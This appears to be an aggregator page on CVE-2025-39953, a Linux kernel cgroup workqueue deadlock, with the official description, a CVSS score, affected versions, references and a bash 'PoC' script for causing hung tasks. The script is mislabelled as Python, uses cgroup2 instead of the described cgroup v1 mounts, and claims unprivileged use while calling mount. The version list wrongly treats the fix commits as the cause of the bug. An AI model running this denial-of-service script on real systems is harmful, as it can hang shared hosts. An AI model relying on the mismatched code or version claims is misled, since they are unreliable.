CVE-2025-39953

Description

In the Linux kernel, the following vulnerability has been resolved: cgroup: split cgroup_destroy_wq into 3 workqueues A hung task can occur during [1] LTP cgroup testing when repeatedly mounting/unmounting perf_event and net_prio controllers with systemd.unified_cgroup_hierarchy=1. The hang manifests in cgroup_lock_and_drain_offline() during root destruction. Related case: cgroup_fj_function_perf_event cgroup_fj_function.sh perf_event cgroup_fj_function_net_prio cgroup_fj_function.sh net_prio Call Trace: cgroup_lock_and_drain_offline+0x14c/0x1e8 cgroup_destroy_root+0x3c/0x2c0 css_free_rwork_fn+0x248/0x338 process_one_work+0x16c/0x3b8 worker_thread+0x22c/0x3b0 kthread+0xec/0x100 ret_from_fork+0x10/0x20 Root Cause: CPU0 CPU1 mount perf_event umount net_prio cgroup1_get_tree cgroup_kill_sb rebind_subsystems // root destruction enqueues // cgroup_destroy_wq // kill all perf_event css // one perf_event css A is dying // css A offline enqueues cgroup_destroy_wq // root destruction will be executed first css_free_rwork_fn cgroup_destroy_root cgroup_lock_and_drain_offline // some perf descendants are dying // cgroup_destroy_wq max_active = 1 // waiting for css A to die Problem scenario: 1. CPU0 mounts perf_event (rebind_subsystems) 2. CPU1 unmounts net_prio (cgroup_kill_sb), queuing root destruction work 3. A dying perf_event CSS gets queued for offline after root destruction 4. Root destruction waits for offline completion, but offline work is blocked behind root destruction in cgroup_destroy_wq (max_active=1) Solution: Split cgroup_destroy_wq into three dedicated workqueues: cgroup_offline_wq – Handles CSS offline operations cgroup_release_wq – Manages resource release cgroup_free_wq – Performs final memory deallocation This separation eliminates blocking in the CSS free path while waiting for offline operations to complete. [1] https://github.com/linux-test-project/ltp/blob/master/runtest/controllers

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE

Linux Kernel < 5.15（需根据具体修复commit确认）

Linux Kernel 5.15.x（受commit 05e0b03447cf影响）

Linux Kernel 6.1.x（受commit 4a1e3ec28e80影响）

Linux Kernel 6.6.x（受commit 79f919a89c9d影响）

Linux Kernel 6.12.x（受commit 993049c9b135影响）

Linux Kernel 6.16.x（受commit a0c896bda707影响）

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-39953 PoC - Trigger cgroup deadlock via concurrent mount/unmount
# This PoC reproduces the hung task scenario described in the vulnerability
# Requires: Linux kernel with cgroup v2, systemd.unified_cgroup_hierarchy=1
# Run as: unprivileged user with cgroup mount permissions

#!/bin/bash
set -e

CGROUP_BASE="/sys/fs/cgroup"
PERF_CGROUP="${CGROUP_BASE}/test_perf"
NET_CGROUP="${CGROUP_BASE}/test_net"

cleanup() {
    echo "[*] Cleaning up..."
    umount "${CGROUP_BASE}" 2>/dev/null || true
    rmdir "${PERF_CGROUP}" 2>/dev/null || true
    rmdir "${NET_CGROUP}" 2>/dev/null || true
}
trap cleanup EXIT

# Ensure cgroup2 is mounted with unified hierarchy
mount -t cgroup2 none "${CGROUP_BASE}" 2>/dev/null || {
    echo "[!] Failed to mount cgroup2"
    exit 1
}

# Enable required controllers
echo "+cpu +memory +perf_event +net_prio" > "${CGROUP_BASE}/cgroup.subtree_control" 2>/dev/null || true

trigger_deadlock() {
    local i=0
    while [ $i -lt 100 ]; do
        # Mount perf_event controller in background
        mkdir "${PERF_CGROUP}" 2>/dev/null || true
        # Simulate workload to create dying CSS
        echo $$ > "${PERF_CGROUP}/cgroup.procs" 2>/dev/null || true

        # Concurrently unmount net_prio (triggers cgroup_kill_sb)
        rmdir "${NET_CGROUP}" 2>/dev/null || true
        mkdir "${NET_CGROUP}" 2>/dev/null || true
        rmdir "${NET_CGROUP}" 2>/dev/null || true

        i=$((i + 1))
    done
}

# Run multiple instances in parallel to trigger race condition
for j in $(seq 1 10); do
    trigger_deadlock &
done

wait
echo "[*] Test completed - check dmesg for hung task warnings"

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-39953
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-39953
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-39953/
[4] VulDB https://vuldb.com/cve/CVE-2025-39953
[5] https://git.kernel.org/stable/c/05e0b03447cf215ec384210441b34b7a3b16e8b0
[6] https://git.kernel.org/stable/c/4a1e3ec28e8062cd9f339aa6a942df9c5bcb6811
[7] https://git.kernel.org/stable/c/79f919a89c9d06816dbdbbd168fa41d27411a7f9
[8] https://git.kernel.org/stable/c/993049c9b1355c78918344a6403427d53f9ee700
[9] https://git.kernel.org/stable/c/a0c896bda7077aa5005473e2c5b3c27173313b4c
[10] https://git.kernel.org/stable/c/cabadd7fd15f97090f752fd22dd7f876a0dc3dc4
[11] https://git.kernel.org/stable/c/ded4d207a3209a834b6831ceec7f39b934c74802
[12] https://git.kernel.org/stable/c/f2795d1b92506e3adf52a298f7181032a1525e04

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-39953", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T08:15:48.627", "lastModified": "2026-01-23T20:01:35.360", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ncgroup: split cgroup_destroy_wq into 3 workqueues\n\nA hung task can occur during [1] LTP cgroup testing when repeatedly\nmounting/unmounting perf_event and net_prio controllers with\nsystemd.unified_cgroup_hierarchy=1. The hang manifests in\ncgroup_lock_and_drain_offline() during root destruction.\n\nRelated case:\ncgroup_fj_function_perf_event cgroup_fj_function.sh perf_event\ncgroup_fj_function_net_prio cgroup_fj_function.sh net_prio\n\nCall Trace:\n\tcgroup_lock_and_drain_offline+0x14c/0x1e8\n\tcgroup_destroy_root+0x3c/0x2c0\n\tcss_free_rwork_fn+0x248/0x338\n\tprocess_one_work+0x16c/0x3b8\n\tworker_thread+0x22c/0x3b0\n\tkthread+0xec/0x100\n\tret_from_fork+0x10/0x20\n\nRoot Cause:\n\nCPU0 CPU1\nmount perf_event umount net_prio\ncgroup1_get_tree cgroup_kill_sb\nrebind_subsystems // root destruction enqueues\n\t\t\t\t// cgroup_destroy_wq\n// kill all perf_event css\n // one perf_event css A is dying\n // css A offline enqueues cgroup_destroy_wq\n // root destruction will be executed first\n css_free_rwork_fn\n cgroup_destroy_root\n cgroup_lock_and_drain_offline\n // some perf descendants are dying\n // cgroup_destroy_wq max_active = 1\n // waiting for css A to die\n\nProblem scenario:\n1. CPU0 mounts perf_event (rebind_subsystems)\n2. CPU1 unmounts net_prio (cgroup_kill_sb), queuing root destruction work\n3. A dying perf_event CSS gets queued for offline after root destruction\n4. Root destruction waits for offline completion, but offline work is\n blocked behind root destruction in cgroup_destroy_wq (max_active=1)\n\nSolution:\nSplit cgroup_destroy_wq into three dedicated workqueues:\ncgroup_offline_wq – Handles CSS offline operations\ncgroup_release_wq – Manages resource release\ncgroup_free_wq – Performs final memory deallocation\n\nThis separation eliminates blocking in the CSS free path while waiting for\noffline operations to complete.\n\n[1] https://github.com/linux-test-project/ltp/blob/master/runtest/controllers"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.6", "versionEndExcluding": "5.4.300", "matchCriteriaId": "7EE80D11-BE25-490A-B037-5E1BC5D3514D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.5", "versionEndExcluding": "5.10.245", "matchCriteriaId": "B0E443AF-02FC-45A1-9CD7-3F80A65F1A15"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.194", "matchCriteriaId": "CF862263-DC8D-4324-A52A-DA1D7880B35A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.154", "matchCriteriaId": "E49CD91E-FC55-45B0-BB63-9AD5F5D70CAA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.6.108", "matchCriteriaId": "A7E8EAEE-7731-4996-9578-696255D61EA2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.49", "matchCriteriaId": "CAA033E9-A2C5-4976-A83E-9804D8FB827F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.16.9", "matchCriteriaId": "638DD910-1189-4F5E-98BF-2D436B695112"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc1:*:*:*:*:*:*", "matchCriteriaId": "327D22EF-390B-454C-BD31-2ED23C998A1C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc ... (truncated)